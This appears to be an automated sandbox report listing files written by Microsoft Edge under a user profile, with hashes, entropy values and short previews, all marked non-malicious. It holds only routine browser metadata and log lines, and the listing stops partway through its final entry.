                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):20480
                                                                                                                                                                                                                                                                                          Entropy (8bit):0.6130108972334924
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:TLapR+DDNzWjJ0npnyXKUO8+jySpYyXmL:TO8D4jJ/6Up+2hv
                                                                                                                                                                                                                                                                                          MD5:2283CC43BB18BE0F783584CDBF5EDB13
                                                                                                                                                                                                                                                                                          SHA1:E33A149AF9361B2309478FC8547A82B1F390E9DD
                                                                                                                                                                                                                                                                                          SHA-256:527810CB4B77AAA7B8CEB0781B6E2763DBE6196C4A3179227E343EDA2027B669
                                                                                                                                                                                                                                                                                          SHA-512:CE3DE43FB4ABEB324230BA1C9F11295352983D6A9394A301F97131040C5F70F5751BE29DD50A3FF755EA6346389F15F4214BFC016208E6811E6CC2C28A20AE8C
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j...%.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\000001.dbtmp

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):16
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                          MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                          SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                          SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                          SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\000003.log

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):375520
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.354078815152969
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6144:dA/imBpx6WdPSxKWcHu5MURacq49QxxPnyEndBuHltBfdK5WNbsVEziP/CfXtLPz:dFdMyq49tEndBuHltBfdK5WNbsVEziPU
                                                                                                                                                                                                                                                                                          MD5:E08BC73872E4C2A33E84439F902E5A5F
                                                                                                                                                                                                                                                                                          SHA1:0FA8D3601574C135132B935C12F4D6F66B66B20F
                                                                                                                                                                                                                                                                                          SHA-256:CFEDBBA5EE62D340029A0AD4ADB62852F61D3B92C7DA89582755CAACF9B7BD7B
                                                                                                                                                                                                                                                                                          SHA-512:882EF2930C2D25011A9DB9B3037C6FADD7FE6E476C43F6F0A22C999E6BD13022433BD0C6D7BF385C5559BD86C09B65FB6B034D1EC3D65EECF0A757CA31531245
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:...m.................DB_VERSION.1.^CTq...............&QUERY_TIMESTAMP:domains_config_gz2.*.*.13380044136601382..QUERY:domains_config_gz2.*.*..[{"name":"domains_config_gz","url":"https://edgeassetservice.azureedge.net/assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtractionDomainsConfig","version":{"major":2,"minor":8,"patch":76},"hash":"78Xsq/1H+MXv88uuTT1Rx79Nu2ryKVXh2J6ZzLZd38w=","size":374872}]..*.`~...............ASSET_VERSION:domains_config_gz.2.8.76..ASSET:domains_config_gz...{"config": {"token_limit": 1600, "page_cutoff": 4320, "default_locale_map": {"bg": "bg-bg", "bs": "bs-ba", "el": "el-gr", "en": "en-us", "es": "es-mx", "et": "et-ee", "cs": "cs-cz", "da": "da-dk", "de": "de-de", "fa": "fa-ir", "fi": "fi-fi", "fr": "fr-fr", "he": "he-il", "hr": "hr-hr", "hu": "hu-hu", "id": "id-id", "is": "is-is", "it": "it-it", "ja": "ja-jp", "ko": "ko-kr", "lv": "lv-lv", "lt": "lt-lt", "mk": "mk-mk", "nl": "nl-nl", "nb": "nb-no", "no": "no-no", "pl": "pl-pl", "pt": "pt-pt", "ro": "

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\CURRENT (copy)

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):16
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                          MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                          SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                          SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                          SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\LOG

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):307
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.155981397525082
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6:5bMY1qLTwi23oH+Tcwtk2WwnvB2KLlrbMN4q2PqLTwi23oH+Tcwtk2WwnvIFUv:yBwZYebkxwnvFL6Ov8wZYebkxwnQFUv
                                                                                                                                                                                                                                                                                          MD5:818810E12F3FCCA19B11E3C0FAC40C2E
                                                                                                                                                                                                                                                                                          SHA1:CB685882E5A4D964EFB47B9FC4B364D58B301645
                                                                                                                                                                                                                                                                                          SHA-256:C64CAC2390B8EC6AD3D2BD8B88FFBF54AE29F6D653AE2316FF5008337030C64E
                                                                                                                                                                                                                                                                                          SHA-512:9BAA16471CE62E5BB89DD1162637F43100EAB2B726797F701929DEB659A03F627D87748FD5DA741335B5AE2E06679728B34F4D01EEB08BD7614D41B96D54ADAF
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:2024/12/30-09:55:35.565 2110 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db since it was missing..2024/12/30-09:55:35.582 2110 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db/MANIFEST-000001.

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\MANIFEST-000001

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):41
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                          MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                          SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                          SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                          SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\domains_config.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:modified
                                                                                                                                                                                                                                                                                          Size (bytes):358860
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.324621979383245
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6144:CgimBVvUrsc6rRA81b/18jyJNjfvrfM6RI:C1gAg1zfvw
                                                                                                                                                                                                                                                                                          MD5:0E782834E18E6DA243FBCFBFE716AF7F
                                                                                                                                                                                                                                                                                          SHA1:B56A5DC33C62BD76B40D1DC372D129D436F18393
                                                                                                                                                                                                                                                                                          SHA-256:357AD457260F590EFA2A89CFDEEF5ED9D138E2462BD1FA3EE0E2D9CD164E378A
                                                                                                                                                                                                                                                                                          SHA-512:41604D2D5484C5D7BC975405C21AD08B5BE05D449E6F241A56235FD2661BABA5D49DEBD35217B89448A193F774D1BAE7144319464C1C39E71E307BA11A422123
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"aee_config":{"ar":{"price_regex":{"ae":"(((ae|aed|\\x{062F}\\x{0660}\\x{0625}\\x{0660}|\\x{062F}\\.\\x{0625}|dhs|dh)\\s*\\d{1,3})|(\\d{1,3}\\s*(ae|aed|\\x{062F}\\x{0660}\\x{0625}\\x{0660}|\\x{062F}\\.\\x{0625}|dhs|dh)))","dz":"(((dzd|da|\\x{062F}\\x{062C})\\s*\\d{1,3})|(\\d{1,3}\\s*(dzd|da|\\x{062F}\\x{062C})))","eg":"(((e\\x{00a3}|egp)\\s*\\d{1,3})|(\\d{1,3}\\s*(e\\x{00a3}|egp)))","ma":"(((mad|dhs|dh)\\s*\\d{1,3})|(\\d{1,3}\\s*(mad|dhs|dh)))","sa":"((\\d{1,3}\\s*(sar\\s*\\x{fdfc}|sar|sr|\\x{fdfc}|\\.\\x{0631}\\.\\x{0633}))|((sar\\s*\\x{fdfc}|sar|sr|\\x{fdfc}|\\.\\x{0631}\\.\\x{0633})\\s*\\d{1,3}))"},"product_terms":"((\\x{0623}\\x{0636}\\x{0641}\\s*\\x{0625}\\x{0644}\\x{0649}\\s*\\x{0627}\\x{0644}\\x{0639}\\x{0631}\\x{0628}\\x{0629})|(\\x{0623}\\x{0636}\\x{0641}\\s*\\x{0625}\\x{0644}\\x{0649}\\s*\\x{0627}\\x{0644}\\x{062D}\\x{0642}\\x{064A}\\x{0628}\\x{0629})|(\\x{0627}\\x{0634}\\x{062A}\\x{0631}\\x{064A}\\s*\\x{0627}\\x{0644}\\x{0622}\\x{0646})|(\\x{062E}\\x{064A}\\x{0627}\\x{0631}

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\000003.log

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):418
                                                                                                                                                                                                                                                                                          Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWWWW
                                                                                                                                                                                                                                                                                          MD5:BF097D724FDF1FCA9CF3532E86B54696
                                                                                                                                                                                                                                                                                          SHA1:4039A5DD607F9FB14018185F707944FE7BA25EF7
                                                                                                                                                                                                                                                                                          SHA-256:1B8B50A996172C16E93AC48BCB94A3592BEED51D3EF03F87585A1A5E6EC37F6B
                                                                                                                                                                                                                                                                                          SHA-512:31857C157E5B02BCA225B189843CE912A792A7098CEA580B387977B29E90A33C476DF99AD9F45AD5EB8DA1EFFD8AC3A78870988F60A32D05FA2DA8F47794FACE
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\LOG

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):317
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.183196893692083
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6:5besN+q2PqLTwi23oH+Tcwt8aPrqIFUt8MbeRRXZmw+MbeRR3VkwOqLTwi23oH+o:XIv8wZYebL3FUt8LX/+LF5TwZYebQJ
                                                                                                                                                                                                                                                                                          MD5:D77272D768291602DBDDD5CFC5B990A2
                                                                                                                                                                                                                                                                                          SHA1:F2FCBC092BAFE4DCDBE8F98F9C0CF1FB7879304C
                                                                                                                                                                                                                                                                                          SHA-256:60A91315681008D1BE2A733A77D5F5FC8C24E4BF64091C6631063F963A04CE3D
                                                                                                                                                                                                                                                                                          SHA-512:58BF2A9AA1C4AC5102CB0F94A7D456A62140F4531EE8284D4BE5AD24F4CCC5555B946D4D3920874BE15149BEFA9C7495F9E1AF89EF819276FAB300814017EAAB
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:2024/12/30-09:55:29.193 d28 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2024/12/30-09:55:29.194 d28 Recovering log #3.2024/12/30-09:55:29.194 d28 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\LOG.old (copy)

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):317
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.183196893692083
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6:5besN+q2PqLTwi23oH+Tcwt8aPrqIFUt8MbeRRXZmw+MbeRR3VkwOqLTwi23oH+o:XIv8wZYebL3FUt8LX/+LF5TwZYebQJ
                                                                                                                                                                                                                                                                                          MD5:D77272D768291602DBDDD5CFC5B990A2
                                                                                                                                                                                                                                                                                          SHA1:F2FCBC092BAFE4DCDBE8F98F9C0CF1FB7879304C
                                                                                                                                                                                                                                                                                          SHA-256:60A91315681008D1BE2A733A77D5F5FC8C24E4BF64091C6631063F963A04CE3D
                                                                                                                                                                                                                                                                                          SHA-512:58BF2A9AA1C4AC5102CB0F94A7D456A62140F4531EE8284D4BE5AD24F4CCC5555B946D4D3920874BE15149BEFA9C7495F9E1AF89EF819276FAB300814017EAAB
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:2024/12/30-09:55:29.193 d28 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2024/12/30-09:55:29.194 d28 Recovering log #3.2024/12/30-09:55:29.194 d28 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\000003.log

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):418
                                                                                                                                                                                                                                                                                          Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWWWW
                                                                                                                                                                                                                                                                                          MD5:BF097D724FDF1FCA9CF3532E86B54696
                                                                                                                                                                                                                                                                                          SHA1:4039A5DD607F9FB14018185F707944FE7BA25EF7
                                                                                                                                                                                                                                                                                          SHA-256:1B8B50A996172C16E93AC48BCB94A3592BEED51D3EF03F87585A1A5E6EC37F6B
                                                                                                                                                                                                                                                                                          SHA-512:31857C157E5B02BCA225B189843CE912A792A7098CEA580B387977B29E90A33C476DF99AD9F45AD5EB8DA1EFFD8AC3A78870988F60A32D05FA2DA8F47794FACE
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\LOG

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):321
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.2026712816945855
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6:5bem9+q2PqLTwi23oH+Tcwt865IFUt8Mbed7JZmw+Mbed79VkwOqLTwi23oH+Tc4:D4v8wZYeb/WFUt8H/+V5TwZYeb/+SJ
                                                                                                                                                                                                                                                                                          MD5:81236D0496CCFF42676E9E9B58BDCBD1
                                                                                                                                                                                                                                                                                          SHA1:F926061800A09501C14C58C308A28228F7009822
                                                                                                                                                                                                                                                                                          SHA-256:57724A753C69B046CC89A8AC8488D5F92B408AB18DDDF4EA7D23598E6960505B
                                                                                                                                                                                                                                                                                          SHA-512:AD864F5E81E8E6EA30D6929C756E3FF913D1BF80CA90AD35082C37C1ECC54718514639F2EDDCA5F0B93E891980AA873DC9391CA8DED2D655929B8E9BEB657E23
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:2024/12/30-09:55:29.197 d28 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2024/12/30-09:55:29.198 d28 Recovering log #3.2024/12/30-09:55:29.198 d28 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\LOG.old (copy)

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):321
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.2026712816945855
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6:5bem9+q2PqLTwi23oH+Tcwt865IFUt8Mbed7JZmw+Mbed79VkwOqLTwi23oH+Tc4:D4v8wZYeb/WFUt8H/+V5TwZYeb/+SJ
                                                                                                                                                                                                                                                                                          MD5:81236D0496CCFF42676E9E9B58BDCBD1
                                                                                                                                                                                                                                                                                          SHA1:F926061800A09501C14C58C308A28228F7009822
                                                                                                                                                                                                                                                                                          SHA-256:57724A753C69B046CC89A8AC8488D5F92B408AB18DDDF4EA7D23598E6960505B
                                                                                                                                                                                                                                                                                          SHA-512:AD864F5E81E8E6EA30D6929C756E3FF913D1BF80CA90AD35082C37C1ECC54718514639F2EDDCA5F0B93E891980AA873DC9391CA8DED2D655929B8E9BEB657E23
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:2024/12/30-09:55:29.197 d28 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2024/12/30-09:55:29.198 d28 Recovering log #3.2024/12/30-09:55:29.198 d28 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\000003.log

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1254
                                                                                                                                                                                                                                                                                          Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:qWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWA:
                                                                                                                                                                                                                                                                                          MD5:826B4C0003ABB7604485322423C5212A
                                                                                                                                                                                                                                                                                          SHA1:6B8EF07391CD0301C58BB06E8DEDCA502D59BCB4
                                                                                                                                                                                                                                                                                          SHA-256:C56783C3A6F28D9F7043D2FB31B8A956369F25E6CE6441EB7C03480334341A63
                                                                                                                                                                                                                                                                                          SHA-512:0474165157921EA84062102743EE5A6AFE500F1F87DE2E87DBFE36C32CFE2636A0AE43D8946342740A843D5C2502EA4932623C609B930FE8511FE7356D4BAA9C
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5........

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):317
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.127442668961282
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6:5bMhldj3+q2PqLTwi23oH+Tcwt8NIFUt8MbMhldjAWZmw+MbMhGjN9VkwOqLTwiV:yVj3+v8wZYebpFUt8xVjAW/+xgN9V5TX
                                                                                                                                                                                                                                                                                          MD5:29C96E53B0253CEBB57B7F300B65D3C9
                                                                                                                                                                                                                                                                                          SHA1:52FC509D11FAC5A8F77F61FCB40D6F6DB34332C9
                                                                                                                                                                                                                                                                                          SHA-256:A757B66080A7C93FF3EFB50571358F70AF161C750F636D326593FA7498A4E29F
                                                                                                                                                                                                                                                                                          SHA-512:FEEDF8EAD8B7A091FFB1165BFCDF7D2611564E4263F36D02CCFBBF0E17B0A0AF0BA7B31884CADD35D5E45F8145AAE42190E1D08953C7620EFA62083FE6FB5B87
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:2024/12/30-09:55:30.110 8ec Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2024/12/30-09:55:30.110 8ec Recovering log #3.2024/12/30-09:55:30.111 8ec Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG.old (copy)

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):317
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.127442668961282
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6:5bMhldj3+q2PqLTwi23oH+Tcwt8NIFUt8MbMhldjAWZmw+MbMhGjN9VkwOqLTwiV:yVj3+v8wZYebpFUt8xVjAW/+xgN9V5TX
                                                                                                                                                                                                                                                                                          MD5:29C96E53B0253CEBB57B7F300B65D3C9
                                                                                                                                                                                                                                                                                          SHA1:52FC509D11FAC5A8F77F61FCB40D6F6DB34332C9
                                                                                                                                                                                                                                                                                          SHA-256:A757B66080A7C93FF3EFB50571358F70AF161C750F636D326593FA7498A4E29F
                                                                                                                                                                                                                                                                                          SHA-512:FEEDF8EAD8B7A091FFB1165BFCDF7D2611564E4263F36D02CCFBBF0E17B0A0AF0BA7B31884CADD35D5E45F8145AAE42190E1D08953C7620EFA62083FE6FB5B87
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:2024/12/30-09:55:30.110 8ec Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2024/12/30-09:55:30.110 8ec Recovering log #3.2024/12/30-09:55:30.111 8ec Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\jmjflgjpcpepeafmmgdpfkogkghcpiha\1.2.1_0\_metadata\computed_hashes.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):429
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.809210454117189
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6:Y8U0vEjrAWT0VAUD9lpMXO4SrqiweVHUSENjrAWT0HQQ9/LZyVMQ3xqiweVHlrSQ:Y8U5j0pqCjJA7tNj0pHx/LZ4hcdQ
                                                                                                                                                                                                                                                                                          MD5:5D1D9020CCEFD76CA661902E0C229087
                                                                                                                                                                                                                                                                                          SHA1:DCF2AA4A1C626EC7FFD9ABD284D29B269D78FCB6
                                                                                                                                                                                                                                                                                          SHA-256:B829B0DF7E3F2391BFBA70090EB4CE2BA6A978CCD665EEBF1073849BDD4B8FB9
